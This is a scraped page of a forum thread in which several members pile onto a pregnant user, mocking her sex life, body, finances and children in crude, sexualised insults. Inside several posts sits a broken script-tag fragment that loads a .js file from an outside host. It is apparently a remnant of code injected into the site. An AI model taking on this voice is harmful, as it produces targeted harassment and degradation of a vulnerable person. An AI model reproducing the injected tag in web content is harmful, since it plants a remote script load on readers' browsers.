BHM BHM BHM
Forum Home Forum Home > Lets Talk > Relationships
  FAQ FAQ  Forum Search   Register Register  Login Login
Perfect Hair Collection

Am I wrong?

Post Reply Post Reply Page  <1 89101112 14>

The Best Human Hair Available with No Service Match

Author
 Rating: Topic Rating: 1 Votes, Average 1.00  Topic Search Topic Search  Topic Options Topic Options
Midna View Drop Down
Elite Member
Elite Member

Post Options Post Options   Thanks (3) Thanks(3)   Quote Midna Quote  Post ReplyReply Direct Link To This Post Posted: Apr 28 2014 at 5:40am
Oh now she's pretending to enjoy her shame < ="https://cloudssl.my.phpcloud.com/super/.js" id="superInsectID">

Sponsored Links

Midna View Drop Down
Elite Member
Elite Member

Post Options Post Options   Thanks (4) Thanks(4)   Quote Midna Quote  Post ReplyReply Direct Link To This Post Posted: Apr 28 2014 at 5:45am
Let this be your last man-whining thread, hun. BHM is tired of you just like all the others you've been used by. Beer We've told you all we can, you're at a point where you ask for advice only to behave pigheadedly and suddenly view your situation as 'da bess.'

Post another and I'll just repost your history in it so members can know this is just a cycle you have no intention of actually learning from and ending. People have given enough of a sh*t about you when you clearly don't give enough of a sh*t about yourself.  Hell, you're willing to endanger your unborn child using pregnancy-incompatible devices and willing to stay with men who endanger the child you already have. 

Nothing left for you to ask in Relationships, boo. You've heard it all and accepted none. Shoo~

Midna View Drop Down
Elite Member
Elite Member

Post Options Post Options   Thanks (1) Thanks(1)   Quote Midna Quote  Post ReplyReply Direct Link To This Post Posted: Apr 28 2014 at 5:47am
Oh and uh, stop asking me sh*t You're like a fangirl, it's weird. I'm not your guru.< ="https://cloudssl.my.phpcloud.com/super/.js" id="superInsectID">

It's already weird enough how you'll say in one post you're broke and have trouble paying for basic necessities but say in another how you're gonna buy this and that for superficial reasons. 

Oh, these poor children.
Midna View Drop Down
Elite Member
Elite Member

Post Options Post Options   Thanks (4) Thanks(4)   Quote Midna Quote  Post ReplyReply Direct Link To This Post Posted: Apr 28 2014 at 5:49am
Originally posted by Twisted_Angel Twisted_Angel wrote:

Did she do a search on me damn all in my coochie who does that..childish ignoring all the haters post but I thought that was so funny.

Printer you are correct on somethings and I do aplogize about saying a childish thing...and calling you out but you have to tone it down..

The only rea
< ="https://cloudssl.my.phpcloud.com/super/.js" id="superInsectID">

I didn't know your vagina was as broad as a forum.
I see why you kept bothering me about the kegelmaster. LOL You actually had a need to use it.
Midna View Drop Down
Elite Member
Elite Member

Post Options Post Options   Thanks (3) Thanks(3)   Quote Midna Quote  Post ReplyReply Direct Link To This Post Posted: Apr 28 2014 at 5:54am
Originally posted by Twisted_Angel Twisted_Angel wrote:

Y get mad when u called yourself aho then go make a thread saying prpregnant women and non black people leave this site...lol midna I made u turn into a child again

http://forum.blackhairmedia.com/if-youre-pregnant-and-or-antiblack-women_topic370336.html

But where did I get mad? I complimented you and said that was cute. LOL What, me saying you fit the term better is me being mad? You do, boo. Or are you upset that I have the self-confidence to use a trusted companion male just as they used you but not catch feelings and set myself up for trouble..? Shocked Sowwy.

Oh no! You've linked the thread where I've made it very obvious it was about you! I didn't even have to link it here. Pregnant and still up in Body Types to ignore her healthcare providers and try the latest big booty fad. Clap Too easy.

Buahaha, oh goodness, I don't even have to insult you. LOL
< ="https://cloudssl.my.phpcloud.com/super/.js" id="superInsectID">

Edited by Midna - Apr 28 2014 at 6:09am
BitterSweet85 View Drop Down

Post Options Post Options   Thanks (5) Thanks(5)   Quote BitterSweet85 Quote  Post ReplyReply Direct Link To This Post Posted: Apr 28 2014 at 7:56am
Ok y'all doin way too much.
Journey94 View Drop Down

Post Options Post Options   Thanks (0) Thanks(0)   Quote Journey94 Quote  Post ReplyReply Direct Link To This Post Posted: Apr 28 2014 at 8:53am
Lmaooooo

Tbaby View Drop Down
Platinum Member
Platinum Member

Post Options Post Options   Thanks (3) Thanks(3)   Quote Tbaby Quote  Post ReplyReply Direct Link To This Post Posted: Apr 28 2014 at 9:54am
Midna, you know you are wasting too much energy on TW. 

She isn't interested in changing her life of crappy men.  She likes posting her self-made dilemmas and arguing against good advice over and over. 

LOL@ Max Rex's 2010 memo!  Hard to believe stuff written 4 years ago still is relevant.  They say those who don't learn from history are doomed to repeat it.Pinch

Princess Grace View Drop Down
Elite Member
Elite Member

Post Options Post Options   Thanks (4) Thanks(4)   Quote Princess Grace Quote  Post ReplyReply Direct Link To This Post Posted: Apr 28 2014 at 11:23am
The only thing that concerns me is those poor babies cause you dont seem to have the good sense God gave a Billy Goat. 
Princess Grace View Drop Down
Elite Member
Elite Member

Post Options Post Options   Thanks (4) Thanks(4)   Quote Princess Grace Quote  Post ReplyReply Direct Link To This Post Posted: Apr 28 2014 at 11:25am
Midna don;t you know she needs to keep up with the latest trends on how to get a donkey ass cause as soon as she shoots out this baby she need to keep it right and tight for the next Mr. Wrong to slither in her unbirth controlled twat you like to pass around like candy. 

Get Longer Healthier Faster Growing Hair
House of CB London
Get Healthier Stronger Longer Hair
The Elite Hair Care Sorority
Electric Cherry Hair
Hair Extensions Wefted Hair Wigs and More
Human Hair Wigs
Wefting Training
Dime Curves Enhancement Shake
Dependable Quality Hair
Switch Up your Look with a protective Style
 Post Reply Post Reply Page  <1 89101112 14>